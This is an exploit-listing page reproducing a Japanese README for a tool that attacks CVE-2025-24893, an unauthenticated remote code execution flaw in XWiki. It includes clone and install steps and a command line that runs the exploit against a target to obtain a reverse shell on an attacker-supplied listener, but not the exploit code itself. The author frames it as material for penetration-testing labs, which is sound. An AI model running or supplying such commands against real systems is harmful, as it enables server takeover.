Sploitus

Exploit for CVE-2025-24893

kitploit · 2026-09-04

Exploit Code

MARKDOWN57 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-VASILYSAINT-CVE-2025-24893
# CVE-2025-24893

XWiki Platformは、その上に構築されたアプリケーションにランタイムサービスを提供する汎用ウィキプラットフォームです。`SolrSearch`エンドポイントの脆弱性により、認証されていないユーザーが任意のリモートコード実行を達成できます。この脆弱性は、XWikiインストール全体の機密性、完全性、可用性に影響を与えます。

**CVE:** CVE-2025-24893

* * *

## デモ

エクスプロイトのデモを以下に示します:

![ターミナルデモ](https://assets.kitploit.com/production/public/readmes/33951/0ddf827ad954dc34c40c76df559976b47ae399d2eb9921beeb814e5db4de1d65.gif)

## 使用方法

このエクスプロイトを使用するには、以下の手順に従ってください:

  1. リポジトリをクローン: `git clone https://github.com/yourusername/CVE-2025-24893.git`
  2. クローンしたディレクトリに移動: `cd CVE-2025-24893`
  3. 必要な依存関係をインストール: `pip install requests`
  4. エクスプロイトを実行:



root@kitploit:~
    
    
    ./CVE-2025-24893_linux-xwiki-exploit.py  -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
    

* * *

## このエクスプロイトについて

このエクスプロイトは、CVE-2025-24893で説明されているリモートコード実行の脆弱性を実証し、認証されていないユーザーが脆弱なLinuxベースのXWikiインストール上でリバースシェルを取得することを可能にします。

私は元々、OSCP準備ラボやHack The Boxなどのトレーニング環境で使用するためにこのツールを開発しました。そこでは、脆弱性を再現するためのシンプルで信頼性の高い方法が必要でした。既存のツールが要件を満たしていなかったため、自作することにしました。

CVE-2025-24893はサポート対象のXWikiリリースではずっと前に修正されていますが、このエクスプロイトは、自分が所有するシステムまたは明示的にテストを許可されたシステムに対してのみ使用してください。

作者は、本ソフトウェアの誤用またはその使用に起因するいかなる損害についても一切の責任を負いません。

## 免責事項

このツールは教育目的および許可されたセキュリティ評価専用です。

自分が所有するシステムまたは明示的にテストを許可されたシステムに対してのみ使用してください。作者は、本ソフトウェアの誤用またはその使用に起因するいかなる損害についても一切の責任を負いません。

## コントリビューション

コントリビューションを歓迎します。

バグを発見した場合、改善の提案がある場合、または追加のペイロード、プラットフォーム、機能のサポートを追加したい場合は、遠慮なくIssueを開くかプルリクエストを送信してください。

建設的なフィードバック、テストレポート、コードのコントリビューションは大変感謝されます。